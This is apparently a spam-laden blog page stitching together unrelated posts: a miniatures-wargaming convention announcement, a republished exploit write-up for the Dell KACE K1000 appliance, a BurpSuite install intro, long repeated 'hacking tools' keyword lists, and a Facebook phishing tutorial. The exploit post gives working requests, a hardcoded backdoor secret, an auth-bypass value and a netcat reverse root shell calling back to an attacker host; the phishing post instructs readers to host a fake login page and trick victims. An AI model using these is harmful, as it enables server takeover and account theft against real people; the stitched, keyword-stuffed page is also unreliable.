Contador nichichanilimonada

viernes, 4 de septiembre de 2020

Gaming At Little Wars In April!

Little Wars is the annual wargaming convention produced by the Historical Miniatures Gaming Society of the Midwest (HMGS-Midwest). It's a great time and very inexpensive too. $40.00USD for three days of great miniatures games of all types - can't beat that!

I'm the guy who usually runs fantasy games in the middle of a lot of historical gaming (Heh) and this year is no different. I'm running a game a day, starting at 11am each day. Here's what's on tap.

Rescue of Hommlet - Friday, 11am - Grand Ballroom Space 7

If you've been reading my blog for the past few weeks, you've seen the preparation I'm making for my GaryCon debut of this Greyhawk-related scenario. Set at the beginning of the venerable module T1 - Village of Hommlet, it sets up an RPG/wargame hybrid scenario. The picture to the left there is the model I've made of the Moathouse. I'm doing this same game at Little Wars

The blurb reads: A discrete summons has reached your ears, for the good people of Hommlet are in fear for their lives! A militia of foul brigands from Nulb have been spotted near the old Moathouse of ill reputation! What evil lurks there and beyond? Find out, brave heroes, using Chainmail (and a bit of Original D&D)

Chaos War in the Dungeon! - Saturday, 11am - Grand Ballroom Space 9

For the fourth year in a row, I'm running Chaos Wars at Little Wars! This year, I'm bringing some fun terrain and an interesting scenario - fighting a desperate battle underground! This isn't your usual dungeon crawl, this a dungeon BRAWL!

The blurb reads: Go underground in dark tunnels and chambers filled with horrors or treasures! Brave Lawful allies fight against foul Bestials! Who will emerge victorious? Fight in a unique terrain setup using Chaos Wars fantasy miniature wargaming rules and all genuine Ral Partha armies!

HOTT Times in Etinerra - Sunday, 11am - Grand Ballroom Space 19

I've paid attention to the games being played at Little Wars and surprisingly, DBA and HOTT are not usually on the event list. This year, I believe that I'm the ONLY DBA/HOTT game there. Which will be great! I'll be bringing my 15mm Human and Orc/Goblin armies and letting players bash each other to pieces!

Here's the blurb: As the Orc and Goblin forces assembled on the horizon, the Human commander gazed nervously from the roof of her castle Stronghold. Would the forces of Weal prevail against the army of Woe? Find out with a fun game of Hordes of the Things set in the Etinerra campaign world. Wizards! Monsters! Oh my!

There's plenty of other great gaming to be had - some SciFi, a lot of historicals. This convention is usually how I scratch my historical itches, so that I don't go and buy a bunch of games and armies and end up never having time for anything else! This year, I'm playing in an American War of Independence game, An Axis & Allies Global game, and a Third Crusades game. And the dealer hall usually vacuums a load of cash from my wallet and credit cards as well.

Can't wait! I hope I'll see you there, come say Hi!

lunes, 31 de agosto de 2020

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
http://targethost/service/kbot_upload.php
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").


The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
    http://targethost/service/tmp/db.php
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:


More articles


domingo, 30 de agosto de 2020

BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.
More articles

  1. Ethical Hacker Tools
  2. Hacking Tools For Kali Linux
  3. Hack Apps
  4. Pentest Tools Url Fuzzer
  5. Top Pentest Tools
  6. Pentest Recon Tools
  7. Black Hat Hacker Tools
  8. Pentest Box Tools Download
  9. Pentest Tools Github
  10. Hacker Tools Free Download
  11. Pentest Tools Website Vulnerability
  12. Github Hacking Tools
  13. Hacks And Tools
  14. Hacking Tools Pc
  15. Free Pentest Tools For Windows
  16. Hacking Tools For Games
  17. Nsa Hacker Tools
  18. Pentest Tools Url Fuzzer
  19. Pentest Tools Kali Linux
  20. How To Hack
  21. Hack App
  22. Hacking Tools Windows
  23. Hacker Tools Free
  24. Hacking Tools Github
  25. Pentest Reporting Tools
  26. Hacker Tools For Pc
  27. Hacking Tools Usb
  28. Hacking App
  29. Hacker Search Tools
  30. World No 1 Hacker Software
  31. Tools Used For Hacking
  32. How To Install Pentest Tools In Ubuntu
  33. Hacking Tools 2020
  34. Best Hacking Tools 2020
  35. Hack Tools Mac
  36. Hacking Tools Usb
  37. Hack App
  38. Android Hack Tools Github
  39. Hacking Tools Usb
  40. Tools 4 Hack
  41. Hackrf Tools
  42. Top Pentest Tools
  43. Pentest Tools Review
  44. Hack Tool Apk
  45. Hacking Tools For Windows
  46. Hacking Tools 2020
  47. World No 1 Hacker Software
  48. New Hack Tools
  49. Tools For Hacker
  50. Pentest Tools
  51. Hacker Tools Mac
  52. What Is Hacking Tools
  53. Blackhat Hacker Tools
  54. Hacker Tools For Pc
  55. Pentest Tools Find Subdomains
  56. Hacker Tools Apk
  57. Hacking App
  58. Hacker Tools Free
  59. Hacking Tools Github
  60. Bluetooth Hacking Tools Kali
  61. Hackers Toolbox
  62. Hack Tools Pc
  63. Hack Tools 2019
  64. World No 1 Hacker Software
  65. Hacking Tools For Windows Free Download
  66. Hacker Tools Apk
  67. Hack Tools Github
  68. Pentest Tools Url Fuzzer
  69. Hack Tools For Windows
  70. Hack Tool Apk
  71. World No 1 Hacker Software
  72. Tools For Hacker
  73. Hacker Tools 2020
  74. Hacker Tools For Ios
  75. Tools Used For Hacking
  76. Pentest Tools Website Vulnerability
  77. Hack Tools Github
  78. Hacker Tools Online
  79. Hacking Tools For Mac
  80. Hacker Hardware Tools
  81. Easy Hack Tools
  82. Hack Tools 2019
  83. Hacking Tools And Software
  84. Easy Hack Tools
  85. Nsa Hack Tools Download
  86. Pentest Tools Github
  87. Pentest Tools Url Fuzzer
  88. Blackhat Hacker Tools
  89. Hack Tools For Games
  90. Hacker Tools
  91. Hacking Tools For Windows 7
  92. Hack Tools For Windows
  93. Hacking Tools Download
  94. Hacking Tools Download
  95. Pentest Tools Free
  96. Hacker Tools Apk Download
  97. Pentest Tools Port Scanner
  98. Pentest Tools Website Vulnerability
  99. Hack Tools
  100. Hacking Tools For Kali Linux
  101. Hacking Tools For Windows Free Download
  102. Hacker Tools Online
  103. Pentest Tools Apk
  104. Hacking Tools Free Download
  105. Pentest Tools Free
  106. Hacking Tools 2019
  107. Hack Tools
  108. Pentest Tools For Mac
  109. Best Hacking Tools 2019
  110. Hack Tools Online
  111. Hack App
  112. Hacker Tools 2020
  113. Best Pentesting Tools 2018
  114. Hacking Tools Download
  115. Hacks And Tools
  116. Pentest Tools Linux
  117. Easy Hack Tools
  118. Hacker Tools Free
  119. Hacker Tools Free Download
  120. Nsa Hack Tools
  121. Hacker Tools Windows
  122. Pentest Tools Android
  123. Pentest Tools Bluekeep
  124. Hacker Techniques Tools And Incident Handling
  125. Hacker Tools Mac
  126. Hack Tools For Games
  127. Underground Hacker Sites
  128. Hacker Tools Github
  129. Tools Used For Hacking
  130. Hacking Tools Kit
  131. Pentest Tools Review
  132. How To Make Hacking Tools
  133. Pentest Tools Online
  134. Tools Used For Hacking
  135. Free Pentest Tools For Windows
  136. Hack Tools For Mac
  137. Hack App
  138. How To Install Pentest Tools In Ubuntu
  139. Hack Tools Mac

HOW TO BECOME A CERTIFIED ETHICAL HACKER

7 Tips to become a hacker?
It is very important for a hacker to learn different types of programming language such as C,C++,Python,Java,PHP etc and it is also necessary to learn hardware and networking for a good hacker because these skill are very useful to become a successful hacker.

1-Programming Language are essential to becoming a good hacker 

2-Networking skills is important to becoming an effective hacker.

3-SQL language are essential to becoming an effective hacker 

4-Internet surfing is also essential for becoming a hacker for gathering information.

5-Cryptography is essential to becoming a certified hacker from which a hacker can share his/her readable data to other person in a nonreadable form with the help of Cryptography.

6-Penetration testing  is also important for a hacker.

7-experiment a lot is also very useful to becoming a ethical hacker.

Follow me on insta_anoymous_adi
Related posts
  1. Hacking Tools Online
  2. Hacking Tools For Windows
  3. New Hack Tools
  4. Game Hacking
  5. Pentest Tools Nmap
  6. Hack Website Online Tool
  7. Top Pentest Tools
  8. New Hacker Tools
  9. Pentest Tools Nmap
  10. Hacking Tools For Windows 7
  11. Hacking Tools For Beginners
  12. Pentest Tools Nmap
  13. Best Hacking Tools 2020
  14. Hacking Tools 2020
  15. Hacking Tools For Pc
  16. Hack Tools Github
  17. Hack Tools Pc
  18. Hacker Tools 2019
  19. Pentest Tools Free
  20. Install Pentest Tools Ubuntu
  21. Hack Tools For Ubuntu
  22. Pentest Tools Linux
  23. Hacking Tools Software
  24. Pentest Tools Apk
  25. Hack Tools For Mac
  26. World No 1 Hacker Software
  27. Physical Pentest Tools
  28. Hacker Tools For Mac
  29. Hacking Tools Windows 10
  30. Hacking Tools Hardware
  31. Pentest Tools Open Source
  32. Hacks And Tools
  33. Hack And Tools
  34. Pentest Tools Subdomain
  35. Pentest Tools Website Vulnerability
  36. Pentest Tools Open Source
  37. Underground Hacker Sites
  38. Pentest Tools For Ubuntu
  39. Hacker Tools Apk
  40. Hack Tools For Games
  41. Nsa Hack Tools Download
  42. Pentest Tools Url Fuzzer
  43. Hack Tools Online
  44. Pentest Tools Bluekeep
  45. Tools 4 Hack
  46. Nsa Hack Tools Download
  47. Usb Pentest Tools
  48. Pentest Tools Tcp Port Scanner
  49. Hacker Tools Free Download
  50. Hacking Tools For Pc
  51. Nsa Hack Tools Download
  52. Pentest Box Tools Download
  53. Hacking Tools For Kali Linux
  54. Pentest Tools Tcp Port Scanner
  55. What Are Hacking Tools
  56. What Are Hacking Tools
  57. Pentest Tools For Mac
  58. What Is Hacking Tools
  59. Hacking Tools 2020
  60. Pentest Tools Apk
  61. Hacker Tools For Mac
  62. Pentest Tools Free
  63. Hacking Tools For Pc
  64. Best Hacking Tools 2019
  65. How To Hack
  66. Computer Hacker
  67. Pentest Tools Alternative
  68. Hacker Tools Free Download
  69. Pentest Tools For Windows
  70. Pentest Tools Github
  71. Blackhat Hacker Tools
  72. Hack Tools
  73. Hack Tools
  74. Hacker Tools For Mac
  75. What Are Hacking Tools
  76. Ethical Hacker Tools
  77. Hacker Tools Hardware
  78. Game Hacking
  79. Growth Hacker Tools
  80. New Hacker Tools
  81. World No 1 Hacker Software
  82. Hack Tools For Windows
  83. Hacking App
  84. Pentest Tools Website Vulnerability
  85. Hacking App
  86. Hacking Tools
  87. Hacker Tools Linux
  88. Hacks And Tools
  89. Hacker Techniques Tools And Incident Handling
  90. Hack Tools Github
  91. Usb Pentest Tools
  92. Hacking Tools For Mac
  93. Hacker Tools Linux
  94. Hacker Tools Apk
  95. Nsa Hack Tools
  96. Hack App
  97. Hack Tools
  98. New Hacker Tools
  99. Hacker
  100. Growth Hacker Tools
  101. World No 1 Hacker Software
  102. Pentest Tools Bluekeep
  103. Pentest Reporting Tools
  104. Pentest Tools For Mac
  105. How To Install Pentest Tools In Ubuntu
  106. Pentest Tools Github
  107. What Are Hacking Tools
  108. Hacker Tools Github
  109. Hacking Tools 2019
  110. Hacking Tools Free Download
  111. Nsa Hack Tools
  112. Kik Hack Tools
  113. Hacking Tools For Windows
  114. Android Hack Tools Github
  115. Pentest Tools For Android
  116. Usb Pentest Tools
  117. Wifi Hacker Tools For Windows
  118. Hacker Tools Free
  119. Pentest Tools Download
  120. Pentest Tools Subdomain
  121. Growth Hacker Tools
  122. Wifi Hacker Tools For Windows
  123. New Hack Tools
  124. Hack Tools For Ubuntu
  125. Pentest Tools For Ubuntu
  126. Game Hacking
  127. Best Pentesting Tools 2018
  128. Hacking Tools 2019
  129. Hacking Apps
  130. Hacking Tools For Kali Linux
  131. Hacker Tools List
  132. Hack App
  133. Hackrf Tools
  134. Hacking Tools Online
  135. Pentest Tools Website Vulnerability
  136. Hack Tools For Games
  137. What Is Hacking Tools
  138. Hacker Tools For Mac
  139. Pentest Reporting Tools
  140. Hacking Tools Windows
  141. Pentest Tools Apk
  142. Hacker Tools Free
  143. Hack Tools For Games
  144. World No 1 Hacker Software
  145. Hack Tool Apk
  146. Hack Tool Apk No Root
  147. Hack Tools
  148. Hacking Tools For Windows 7
  149. Nsa Hacker Tools
  150. Game Hacking

HOW TO HACK A FACEBOOK ACCOUNT? STEP BY STEP

Phishing is the way to obtain sensitive information such as usernames, passwords, and credit card details or any other confidential information, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. Phishing is typically carried out by several ways like email spoofing or instant messaging, and it often directs users to enter personal information at a fake website, the look and feel of which are almost identical to the legitimate one. In this tutorial, I will be showing how to hack a facebook account through phishing.

SO, HOW TO HACK A FACEBOOK ACCOUNT?

There are few techniques by which you can hack a facebook account but here the easiest way we'll discuss.

REQUIREMENTS

  1. Phisher Creator ( Fake page generator)
  2. Hosting ( To host a fake page). Either you can purchase one or also can use free hosting like 110mb.com. But in free hosting, the account will be suspended after a few logins.

STEPS TO FOLLOW

  1. Download phisher creator and run it.
  2. As you run it, you'll see a screen like the shown below. Here you can type the fields as I have done. 
  3. Once you hit the Create Phisher button, it'll create a fake facebook index page and fb_login.php file in the output folder.
  4. Now you need to upload these both files index.html and fb_login.php to the hosting account.
  5. After uploading the file, open the index.html file path. It will open up a page like same facebook page as you can see below.
  6. We're all done, now we just need to copy the URL of our fake page and distribute it to the victims, you just have to trick them with your social engineering that how you convenience them to open this URL to login facebook. Once someone tries to login through your fake facebook page URL, you'll get their account username and password in the log_file.txt in the same directory of hosting where you have uploaded index.php and fb_login.php.
Hope it'll work fine for you and you have learned how to hack a facebook account. If you find any question or query related to this, feel free to comment below or you can also follow another way that might work well for you to hack facebook account.
Read more